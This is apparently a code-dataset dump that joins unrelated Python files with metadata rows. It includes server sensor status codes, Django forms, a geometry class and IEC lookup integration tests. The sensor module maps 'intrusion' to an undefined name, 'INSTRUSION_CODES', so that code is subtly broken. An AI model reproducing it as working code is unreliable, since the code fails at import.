'0x22a0010', '0x22b0010', '0x22c0010',
'0x22d0010', '0x22e0010', '0x22f0010',
'0x2300010', '0x2310010', '0x2320010',
'0x2330010', '0x2340010', '0x2350010',
'0x2360010', '0x2370010', '0x2380010',
'0x2390010', '0x23a0010', '0x23e0010',
'0x2410010', '0x2420010', '0x2430010',
'0x2440010', '0x2450010', '0x2460010',
'0x2470010', '0x2480010', '0x2530010',
]
BOGUS_IDS_2650 = [ '0x1350010', '0x1360010', '0x2160061',
'0x2170061', '0x2180061', '0x2190061',
'0x21a0061', '0x21b0061', '0x21c0061',
'0x21d0061', '0x21e0060', '0x21e0061',
'0x21f0060', '0x21f0061', '0x2d00010',
]
BOGUS_IDS_1750 = [ '0x1060062', '0x1070062', '0x1080062',
'0x10f0062', '0x1120062', '0x1030062',
'0x1020062', '0x20e0062', '0x2110062',
'0x2160062', '0x2170062', '0x2180062',
'0x2190062', '0x21a0062', '0x21b0062',
'0x21f0062', '0x21e0062', '0x2160061',
'0x2170061', '0x2180061', '0x2190061',
'0x21a0061', '0x21b0061', '0x21f0061',
'0x21e0061', '0x1010010', '0x1020010',
'0x1030010', '0x1040010', '0x1080010',
'0x1090010', '0x10a0010', '0x1100010',
'0x1110010', '0x1120010', '0x1130010',
'0x1140010', '0x1150010', '0x21e0010',
'0x2210010', '0x2220010', '0x2230010',
'0x2240010', '0x2250010', '0x2260010',
'0x2290010', '0x22a0010', '0x22b0010',
'0x22c0010', '0x22d0010', '0x22e0010',
'0x22f0010', '0x2300010', '0x2310010',
'0x2320010', '0x2330010', '0x2340010',
'0x2350010', '0x2360010', '0x2370010',
'0x2380010', '0x2390010', '0x23a0010',
'0x13b0010', '0x13c0010', '0x13f0010',
'0x2440010', '0x2450010', '0x2460010',
'0x2470010', '0x2480010', '0x14a0010',
'0x14d0010', '0x14e0010', '0x1500010',
'0x1510010', '0x2000010', '0x2570010',
'0x10f0060', '0x1120060', '0x1020060',
'0x1010018', '0x1020018', '0x1030018',
'0x1040018', '0x1050018', '0x1060018',
'0x1070018',
]
PROPNAMES = [ 'NAME',
'SEVERITY',
'LOW_CRITICAL',
'LOW_NON_CRITICAL',
'VAL',
'UNITS',
'UPPER_NON_CRITICAL',
'UPPER_CRITICAL',
'SENSOR_TYPE',
]
DRIVE_SLOT_CODES = { '0' : 'Good',
'1' : 'No Error',
'2' : 'Faulty Drive',
'4' : 'Drive Rebuilding',
'8' : 'Drive In Failed Array',
'16' : 'Drive In Critical Array',
'32' : 'Parity Check Error',
'64' : 'Predicted Error',
'128' : 'No Drive',
}
POWER_UNIT_CODES = { '0' : 'AC Power Unit',
'1' : 'DC Power Unit',
}
BUTTON_CODES = { '0' : 'Power Button Disabled',
'1' : 'Power Button Enabled'
}
FAN_CONTROL_CODES = { '0' : 'Normal Operation',
'1' : 'Unknown',
}
INTRUSION_CODES = { '0' : 'No Intrusion',
'1' : 'Cover Intrusion Detected',
'2' : 'Bezel Intrusion Detected',
}
POWER_SUPPLY_CODES = { '1' : 'Good',
'2' : 'Failure Detected',
'4' : 'Failure Predicted',
'8' : 'Power Lost',
'16' : 'Not Present',
}
PROCESSOR_CODES = { '1' : 'Good',
'2' : 'Failure Detected',
'4' : 'Failure Predicted',
'8' : 'Power Lost',
'16' : 'Not Present',
}
CODES = { 'button' : BUTTON_CODES,
'drive slot' : DRIVE_SLOT_CODES,
'fan control' : FAN_CONTROL_CODES,
'intrusion' : INSTRUSION_CODES,
'power supply' : POWER_SUPPLY_CODES,
'power unit' : POWER_UNIT_CODES,
'processor' : PROCESSOR_CODES,
}
| 40.11 | 87 | 0.446771 | 547 | 8,022 | 6.486289 | 0.521024 | 0.008455 | 0.012401 | 0.012401 | 0.232244 | 0.206877 | 0.127959 | 0.127959 | 0.127959 | 0.127959 | 0 | 0.360154 | 0.417477 | 8,022 | 199 | 88 | 40.311558 | 0.399101 | 0.002493 | 0 | 0.106509 | 0 | 0 | 0.415573 | 0 | 0 | 0 | 0.241345 | 0 | 0 | 1 | 0 | false | 0.005917 | 0.04142 | 0 | 0.04142 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
55bbcfb0657fa9d696e2cb0dec828c20a4c0e1c7 | 156 | py | Python | rpi/LiDAR.py | shadowsburney/LiDAR | f88cca9fbdae2d0dbe47a6e06cd965a2aaa82a0a | [
"MIT"
] | null | null | null | rpi/LiDAR.py | shadowsburney/LiDAR | f88cca9fbdae2d0dbe47a6e06cd965a2aaa82a0a | [
"MIT"
] | null | null | null | rpi/LiDAR.py | shadowsburney/LiDAR | f88cca9fbdae2d0dbe47a6e06cd965a2aaa82a0a | [
"MIT"
] | null | null | null | from sensor import Sensor
from stepper import Stepper
sensor = Sensor()
stepper = Stepper(100)
#stepper.start()
while True:
print(sensor.measure())
| 13 | 27 | 0.730769 | 20 | 156 | 5.7 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023077 | 0.166667 | 156 | 11 | 28 | 14.181818 | 0.853846 | 0.096154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0.166667 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
55c0c3ecc4384f35e0ec61e90038c58f6fa656b9 | 89 | py | Python | languages/116/examples/test_problem.py | c3333/sphereengine-languages | ef76cbffe67407d88519ba1e4bfaa20e3a55ccff | [
"Apache-2.0"
] | 5 | 2019-05-05T15:47:24.000Z | 2021-07-22T14:29:13.000Z | languages/116/examples/test_problem.py | c3333/sphereengine-languages | ef76cbffe67407d88519ba1e4bfaa20e3a55ccff | [
"Apache-2.0"
] | 1 | 2022-03-29T14:20:04.000Z | 2022-03-29T14:20:04.000Z | languages/116/examples/test_problem.py | c3333/sphereengine-languages | ef76cbffe67407d88519ba1e4bfaa20e3a55ccff | [
"Apache-2.0"
] | 4 | 2020-02-25T14:30:43.000Z | 2021-05-12T10:05:05.000Z | from sys import stdin
for line in stdin:
n = int(line)
if n == 42:
break
print(n)
| 9.888889 | 21 | 0.629213 | 17 | 89 | 3.294118 | 0.764706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030769 | 0.269663 | 89 | 8 | 22 | 11.125 | 0.830769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.166667 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e96b8708dc8be78814c697d042595105e2d873c2 | 80 | py | Python | Getting_Started_With_Raspberry_Pi_Pico/variable/code.py | gamblor21/Adafruit_Learning_System_Guides | f5dab4a758bc82d0bfc3c299683fe89dc093912a | [
"MIT"
] | 665 | 2017-09-27T21:20:14.000Z | 2022-03-31T09:09:25.000Z | Getting_Started_With_Raspberry_Pi_Pico/variable/code.py | gamblor21/Adafruit_Learning_System_Guides | f5dab4a758bc82d0bfc3c299683fe89dc093912a | [
"MIT"
] | 641 | 2017-10-03T19:46:37.000Z | 2022-03-30T18:28:46.000Z | Getting_Started_With_Raspberry_Pi_Pico/variable/code.py | gamblor21/Adafruit_Learning_System_Guides | f5dab4a758bc82d0bfc3c299683fe89dc093912a | [
"MIT"
] | 734 | 2017-10-02T22:47:38.000Z | 2022-03-30T14:03:51.000Z | """Example of assigning a variable."""
user_name = input("What is your name? ")
| 26.666667 | 40 | 0.6875 | 12 | 80 | 4.5 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 80 | 2 | 41 | 40 | 0.794118 | 0.4 | 0 | 0 | 0 | 0 | 0.452381 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e96f7f5812e754a8c8dec16943815bc6604a8f49 | 216 | py | Python | rxkcd/models.py | aeternalis1/Relevant-XKCD | a9145974453b94ecf77a587b83bd69d974f14380 | [
"MIT"
] | null | null | null | rxkcd/models.py | aeternalis1/Relevant-XKCD | a9145974453b94ecf77a587b83bd69d974f14380 | [
"MIT"
] | null | null | null | rxkcd/models.py | aeternalis1/Relevant-XKCD | a9145974453b94ecf77a587b83bd69d974f14380 | [
"MIT"
] | null | null | null | class Comic:
def __init__(self, comic_num):
self.id = comic_num
self.title = ""
self.title_text = ""
self.transcript = ""
self.explanation = ""
self.img_url = ""
self.og_title = ""
self.og_ttext = "" | 21.6 | 31 | 0.62963 | 29 | 216 | 4.344828 | 0.517241 | 0.126984 | 0.190476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.208333 | 216 | 10 | 32 | 21.6 | 0.736842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.2 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e96ffd9e458abb20cec71135158a8cf1ce09e9d1 | 888 | py | Python | ElevatorBot/commands/funStuff/ticTacToe/vsAI.py | LukasSchmid97/destinyBloodoakStats | 1420802ce01c3435ad5c283f44eb4531d9b22c38 | [
"MIT"
] | 3 | 2019-10-19T11:24:50.000Z | 2021-01-29T12:02:17.000Z | ElevatorBot/commands/funStuff/ticTacToe/vsAI.py | LukasSchmid97/destinyBloodoakStats | 1420802ce01c3435ad5c283f44eb4531d9b22c38 | [
"MIT"
] | 29 | 2019-10-14T12:26:10.000Z | 2021-07-28T20:50:29.000Z | ElevatorBot/commands/funStuff/ticTacToe/vsAI.py | LukasSchmid97/destinyBloodoakStats | 1420802ce01c3435ad5c283f44eb4531d9b22c38 | [
"MIT"
] | 2 | 2019-10-13T17:11:09.000Z | 2020-05-13T15:29:04.000Z | # from discord.ext.commands import Cog
# from discord_slash import SlashContext, cog_ext
# from discord_slash.utils.manage_commands import create_option
#
#
# class TicTacToeAI(Cog):
# def __init__(self, client):
# self.client = client
#
# @cog_ext.cog_subcommand(
# base="tictactoe",
# base_description="You know and love it - TicTacToe",
# name="computer",
# description="Try to beat me in a tic tac toe game",
# options=[
# create_option(
# name="easy_mode",
# description="Set this to true if you are too weak for the normal mode",
# option_type=5,
# required=False,
# ),
# ],
# )
# async def _tictactoe_ai(self, ctx: SlashContext, easy_mode: bool = False):
# pass
#
#
# def setup(client):
# TicTacToeAI(client)
| 29.6 | 89 | 0.581081 | 101 | 888 | 4.930693 | 0.613861 | 0.066265 | 0.064257 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001634 | 0.310811 | 888 | 29 | 90 | 30.62069 | 0.812092 | 0.933559 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e988aca86693a630d0af6b4768506c2e555391e5 | 71 | py | Python | Atividade do Livro-Nilo Ney(PYTHON)/Cap.03/exe 3.13.py | EduardoJonathan0/Python | 0e4dff4703515a6454ba25c6f401960b6155f32f | [
"MIT"
] | null | null | null | Atividade do Livro-Nilo Ney(PYTHON)/Cap.03/exe 3.13.py | EduardoJonathan0/Python | 0e4dff4703515a6454ba25c6f401960b6155f32f | [
"MIT"
] | null | null | null | Atividade do Livro-Nilo Ney(PYTHON)/Cap.03/exe 3.13.py | EduardoJonathan0/Python | 0e4dff4703515a6454ba25c6f401960b6155f32f | [
"MIT"
] | null | null | null | C = int(input("Insira um valor: "))
Fire = (9 * C / 5) + 32
print(Fire) | 23.666667 | 35 | 0.56338 | 13 | 71 | 3.076923 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 0.211268 | 71 | 3 | 36 | 23.666667 | 0.642857 | 0 | 0 | 0 | 0 | 0 | 0.236111 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e98f3c0cbfe695e09cf6acaf634dcaef0d39ab20 | 965 | py | Python | backend/forms.py | adarshrao1/Flood_detection | 4a2a7ecef178366700d5c29a13d45143eaa7cc54 | [
"CC0-1.0"
] | null | null | null | backend/forms.py | adarshrao1/Flood_detection | 4a2a7ecef178366700d5c29a13d45143eaa7cc54 | [
"CC0-1.0"
] | null | null | null | backend/forms.py | adarshrao1/Flood_detection | 4a2a7ecef178366700d5c29a13d45143eaa7cc54 | [
"CC0-1.0"
] | 5 | 2021-06-05T14:11:04.000Z | 2021-06-19T05:51:56.000Z | from django.forms import ModelForm
from backend.models import Image, Image2
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django import forms
class CreateUserForm(UserCreationForm):
email = forms.EmailField(
widget=forms.TextInput(attrs={'class': 'form-control', }),
)
username = forms.CharField(
widget=forms.TextInput(attrs={'class': 'form-control', }),
)
password1 = forms.CharField(
widget=forms.PasswordInput(attrs={'class': 'form-control', }),
)
password2 = forms.CharField(
widget=forms.PasswordInput(attrs={'class': 'form-control', }),
)
class Meta:
model = User
fields = ['username', 'email', 'password1', 'password2']
class ImageForm(ModelForm):
class Meta:
model = Image
fields = "__all__"
class ImageForm2(ModelForm):
class Meta:
model = Image2
fields = "__all__"
| 26.081081 | 70 | 0.654922 | 99 | 965 | 6.30303 | 0.333333 | 0.064103 | 0.089744 | 0.134615 | 0.320513 | 0.320513 | 0.320513 | 0.189103 | 0.189103 | 0 | 0 | 0.009309 | 0.220725 | 965 | 36 | 71 | 26.805556 | 0.820479 | 0 | 0 | 0.310345 | 0 | 0 | 0.117098 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.172414 | 0.172414 | 0 | 0.517241 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
e9a7d2f66b4f8dbaa2eb22e345ef51c2d6c7fe14 | 2,360 | py | Python | src/Line.py | npanuhin/BIOCAD-BWA | 50f56fd7d08b8ad1247934c902fb137f3c28cdf8 | [
"MIT"
] | null | null | null | src/Line.py | npanuhin/BIOCAD-BWA | 50f56fd7d08b8ad1247934c902fb137f3c28cdf8 | [
"MIT"
] | null | null | null | src/Line.py | npanuhin/BIOCAD-BWA | 50f56fd7d08b8ad1247934c902fb137f3c28cdf8 | [
"MIT"
] | null | null | null | from typing import List
from collections import deque
class Line:
"""
Properties:
start_x {0}
start_y {1}
end_x {2}
end_y {3}
dots = [dot1, ..., dotN] {4}
coords = (start_x, start_y, end_x, end_y)
"""
def __init__(self, start_x=None, start_y=None, end_x=None, end_y=None, dots=[]):
self.start_x = start_x
self.start_y = start_y
self.end_x = end_x
self.end_y = end_y
self.dots = dots
def __repr__(self):
return "Line(start_x={}, start_y={}, end_x={}, end_y={}, dots=[{}])".format(
self.start_x, self.start_y, self.end_x, self.end_y, len(self.dots)
)
@property
def coords(self):
return self.start_x, self.start_y, self.end_x, self.end_y
# @property
# def x1(self):
# return self.start_x
# @property
# def y1(self):
# return self.start_y
# @property
# def x2(self):
# return self.end_x
# @property
# def y2(self):
# return self.end_y
@property
def center_x(self):
return (self.start_x + self.end_x) // 2
@property
def center_y(self):
return (self.start_y + self.end_y) // 2
def isTiltedCorrectly(self):
return self.start_y <= self.end_y
@property
def k(self):
return (self.end_y - self.start_y) / (self.end_x - self.start_x)
@property
def b(self):
return self.end_y - self.end_x * self.k
def copyCoords(self):
return Line(self.start_x, self.start_y, self.end_x, self.end_y, dots=[])
def shift(self, dx=0, dy=0):
self.start_x += dx
self.start_y += dy
self.end_x += dx
self.end_y += dy
for i in range(len(self.dots)):
self.dots[i][0] += dx
self.dots[i][1] += dy
def rotateY(self, rotation_center, line=True, dots=False):
if line:
self.start_y -= (self.start_y - rotation_center) * 2
self.end_y -= (self.end_y - rotation_center) * 2
if dots:
for i in range(len(self.dots)):
self.dots[i][1] -= (self.dots[i][1] - rotation_center) * 2
def shiftLines(lines, count) -> List[Line]:
result = deque(lines)
for _ in range(count):
result.append(result.popleft())
return list(result)
| 25.106383 | 84 | 0.555932 | 347 | 2,360 | 3.564842 | 0.167147 | 0.118836 | 0.077607 | 0.073565 | 0.44139 | 0.292643 | 0.232821 | 0.215036 | 0.137429 | 0.137429 | 0 | 0.012868 | 0.308475 | 2,360 | 93 | 85 | 25.376344 | 0.745098 | 0.147034 | 0 | 0.134615 | 0 | 0 | 0.030071 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0 | 0.038462 | 0.153846 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
e9bd8c135bbdae40ce2ed51669ba9beb880235de | 561 | py | Python | typeidea/comment/adminx.py | LastDanceG/typeblog | fdd043546813866669c004bc8d8aedbfcfa326f2 | [
"MIT"
] | 1 | 2020-02-20T12:01:43.000Z | 2020-02-20T12:01:43.000Z | typeidea/comment/adminx.py | LastDanceG/typeblog | fdd043546813866669c004bc8d8aedbfcfa326f2 | [
"MIT"
] | 2 | 2020-06-06T00:45:15.000Z | 2021-06-10T22:35:31.000Z | typeidea/comment/adminx.py | LastDanceG/typeblog | fdd043546813866669c004bc8d8aedbfcfa326f2 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import xadmin
from django.contrib import admin
# from typeidea.custom_site import custom_site
from typeidea.custom_admin import BaseOwnerAdmin
from .models import Comment
# Register your models here.
class CommentAdmin(object):
list_display = ['target', 'nickname', 'status', 'website', 'email', 'create_time']
search_fields = ['nickname', 'status']
actions_on_top = True
actions_on_bottom = True
date_hierarchy = 'create_time'
xadmin.site.register(Comment, CommentAdmin) | 26.714286 | 86 | 0.750446 | 69 | 561 | 5.855072 | 0.608696 | 0.059406 | 0.089109 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002092 | 0.14795 | 561 | 21 | 87 | 26.714286 | 0.843096 | 0.165775 | 0 | 0 | 0 | 0 | 0.146237 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.416667 | 0 | 0.916667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
e9da66e1d85822aa027c49a94455e58540701de1 | 7,156 | py | Python | iec/iec_lookup/tests/test_integration_services.py | divinedeveloper/iec-web-service | 0d5e7a05356cc8d88372a559bd5df787d8dc1f75 | [
"MIT"
] | null | null | null | iec/iec_lookup/tests/test_integration_services.py | divinedeveloper/iec-web-service | 0d5e7a05356cc8d88372a559bd5df787d8dc1f75 | [
"MIT"
] | null | null | null | iec/iec_lookup/tests/test_integration_services.py | divinedeveloper/iec-web-service | 0d5e7a05356cc8d88372a559bd5df787d8dc1f75 | [
"MIT"
] | null | null | null | from iec_lookup.services.iec_lookup_service import IECLookupService
from iec_lookup.tests.fixtures import mongo_test_db_setup, importer_exporter_code_details_as_json, importer_exporter_code_details_as_object, dgft_succes_response_html_string, dgft_error_response_html_string, iec_table_section_list, basic_iec_details_as_object, dgft_error_message
# from bs4 import BeautifulSoup, NavigableString, Tag
import bs4
from iec_lookup.models import ImporterExporterCodeDetails, Director, Branch, RegistrationDetails, RegistrationCumMembershipCertificateDetails, ImporterExporterCodeToBeRetrieved
from iec_lookup.custom_exceptions import CustomApiException
from django.conf import settings
from rest_framework import status
from collections import OrderedDict
import mock
from mock import MagicMock
import mongoengine
import pytest
from iec_lookup import utils
from pprint import pprint
from pytest_mock import mocker
import mongomock
import requests
import json
import logging
# Create your tests here.
# Feature: To be able to do something
# In order to do something
# As someone
# I want the system to do this thing
# Scenario: A sample one
# Given this situation
# When I do something
# Then what I get is what I was expecting for
@pytest.mark.integrationtest
@pytest.mark.usefixtures('mongo_test_db_setup')
class TestIntegrationIecLookupService:
def setup_method(self):
"""
Initial data setup
"""
self.request_json = {'code': "1198002743",'name': "CAP"}
self.non_existing_iec_json = {'code': "1298001743",'name': "PAC"}
self.iec_lookup_service = IECLookupService()
@pytest.mark.xfail(raises= requests.exceptions.ConnectionError, reason="DGFT site down")
def test_integration_check_dgft_site_down(self):
"""
This method will tests poll_dgft_site_with_iec_and_name method in service
check if dgft site is down and get ERROR
assert message is ERROR then site is down else not
"""
dgft_site_response = self.iec_lookup_service.poll_dgft_site_with_iec_and_name(self.request_json)
assert dgft_site_response != "ERROR"
def test_integration_save_complete_iec_details(self, basic_iec_details_as_object, importer_exporter_code_details_as_object):
"""
This method will tests save_complete_iec_details method in service
get all data and save in iec details document
assert data is persisted
"""
saved_iec_details = self.iec_lookup_service.save_complete_iec_details(basic_iec_details_as_object,
importer_exporter_code_details_as_object.directors,importer_exporter_code_details_as_object.branches,
importer_exporter_code_details_as_object.registration_details,importer_exporter_code_details_as_object.rcmc_details)
mongo_test_db_setup.document_id = saved_iec_details.id
assert saved_iec_details.importer_exporter_code == basic_iec_details_as_object.importer_exporter_code
assert basic_iec_details_as_object.party_name in saved_iec_details.party_name
assert saved_iec_details.exporter_type != "" or None
assert saved_iec_details.importer_exporter_code_status != "" or None
assert saved_iec_details.nature_of_concern != "" or None
def test_integration_get_iec_with_code_and_name(self):
"""
This method will tests get_iec_with_code_and_name method in service
to check if dgft site is up and get data
assert data is returned as per request
"""
importer_exporter_code_details = self.iec_lookup_service.get_iec_with_code_and_name(self.request_json)
assert importer_exporter_code_details.id == mongo_test_db_setup.document_id
assert importer_exporter_code_details.importer_exporter_code == self.request_json['code']
assert self.request_json['name'] in importer_exporter_code_details.party_name
assert importer_exporter_code_details.exporter_type != "" or None
assert importer_exporter_code_details.importer_exporter_code_status != "" or None
assert importer_exporter_code_details.nature_of_concern != "" or None
def test_integration_iec_with_code_and_name_not_in_db(self):
"""
This method will tests get_iec_with_code_and_name method in service
to check if iec data is available in db
assert none is returned
"""
importer_exporter_code_details = self.iec_lookup_service.get_iec_with_code_and_name(self.non_existing_iec_json)
assert importer_exporter_code_details == None
def test_integration_save_iec_to_retrieve_data(self):
"""
This method will tests get_or_save_iec_to_retrieve_data method in service
to check if dgft site is down save iec code and name to fetch data later
assert iec to be retrieved is persisted
"""
importer_exporter_code_to_retrieve = self.iec_lookup_service.get_or_save_iec_to_retrieve_data(self.non_existing_iec_json)
mongo_test_db_setup.document_id = importer_exporter_code_to_retrieve.id
assert importer_exporter_code_to_retrieve.importer_exporter_code == self.non_existing_iec_json['code']
assert self.non_existing_iec_json['name'] == importer_exporter_code_to_retrieve.name
assert importer_exporter_code_to_retrieve.is_iec_data_retrieved == False
def test_integration_get_iec_to_retrieve_data(self):
"""
This method will tests get_or_save_iec_to_retrieve_data method in service
to check if dgft site is down fetch iec code and name from iec to be retrieved
assert iec to be retrieved exists
"""
importer_exporter_code_to_retrieve = self.iec_lookup_service.get_or_save_iec_to_retrieve_data(self.non_existing_iec_json)
assert importer_exporter_code_to_retrieve.id == mongo_test_db_setup.document_id
assert importer_exporter_code_to_retrieve != None
def test_integration_no_iec_with_code_and_name_in_db(self):
"""
This method will tests get_iec_with_code_and_name method in service
to check if dgft site is up and get data
assert data is returned as per request
"""
importer_exporter_code_details = self.iec_lookup_service.get_iec_with_code_and_name(self.non_existing_iec_json)
assert importer_exporter_code_details == None
def test_integration_retrieve_iec_data_with_code(self):
"""
This method will tests retrieve_iec_data_with_code method in service
to check if iec data is present in db
assert data is returned as per iec code
"""
importer_exporter_code_details = self.iec_lookup_service.retrieve_iec_data_with_code(self.request_json['code'])
assert importer_exporter_code_details.importer_exporter_code == self.request_json['code']
assert self.request_json['name'] in importer_exporter_code_details.party_name
assert importer_exporter_code_details.exporter_type != "" or None
assert importer_exporter_code_details.importer_exporter_code_status != "" or None
assert importer_exporter_code_details.nature_of_concern != "" or None
def test_integration_not_found_retrieve_iec_data_with_code(self):
"""
This method will tests retrieve_iec_data_with_code method in service
assert iec not found exception is raised
"""
with pytest.raises(CustomApiException) as exc_info:
self.iec_lookup_service.retrieve_iec_data_with_code(self.non_existing_iec_json['code'])
def teardown_method(self):
"""
Set values to none
"""
self.request_json = None
self.non_existing_iec_json = None
self.iec_lookup_service = None
| 42.595238 | 279 | 0.827138 | 1,083 | 7,156 | 5.051708 | 0.154201 | 0.11698 | 0.146226 | 0.118443 | 0.623286 | 0.564979 | 0.481448 | 0.439773 | 0.418753 | 0.400658 | 0 | 0.003486 | 0.118083 | 7,156 | 167 | 280 | 42.850299 | 0.863413 | 0.23938 | 0 | 0.205128 | 0 | 0 | 0.021228 | 0 | 0 | 0 | 0 | 0 | 0.307692 | 1 | 0.141026 | false | 0 | 0.628205 | 0 | 0.782051 | 0.012821 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
7578054f5e5fa0cd2bf6c67b5dfd6c6a49acba24 | 563 | py | Python | posts/migrations/0002_auto_20181129_2311.py | ddeveloper72/Dhjango-Blog | 8f9771a149a944e32aa192de97ab69092a1492d2 | [
"CC-BY-3.0"
] | null | null | null | posts/migrations/0002_auto_20181129_2311.py | ddeveloper72/Dhjango-Blog | 8f9771a149a944e32aa192de97ab69092a1492d2 | [
"CC-BY-3.0"
] | null | null | null | posts/migrations/0002_auto_20181129_2311.py | ddeveloper72/Dhjango-Blog | 8f9771a149a944e32aa192de97ab69092a1492d2 | [
"CC-BY-3.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-11-29 23:11
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('posts', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='post',
old_name='piblished_date',
new_name='published_date',
),
migrations.RenameField(
model_name='post',
old_name='view',
new_name='views',
),
]
| 21.653846 | 49 | 0.57016 | 58 | 563 | 5.293103 | 0.655172 | 0.136808 | 0.169381 | 0.19544 | 0.267101 | 0.267101 | 0.267101 | 0 | 0 | 0 | 0 | 0.056848 | 0.312611 | 563 | 25 | 50 | 22.52 | 0.736434 | 0.122558 | 0 | 0.333333 | 1 | 0 | 0.126273 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7593f4e87b009e30bfc06b0f207cd76f6db5a110 | 288 | py | Python | QRcodegenerator.py | arpitarunkumaar/Hacktoberfest2021 | 0af40f90a6c0716caadbbfff44ece947b6146f60 | [
"MIT"
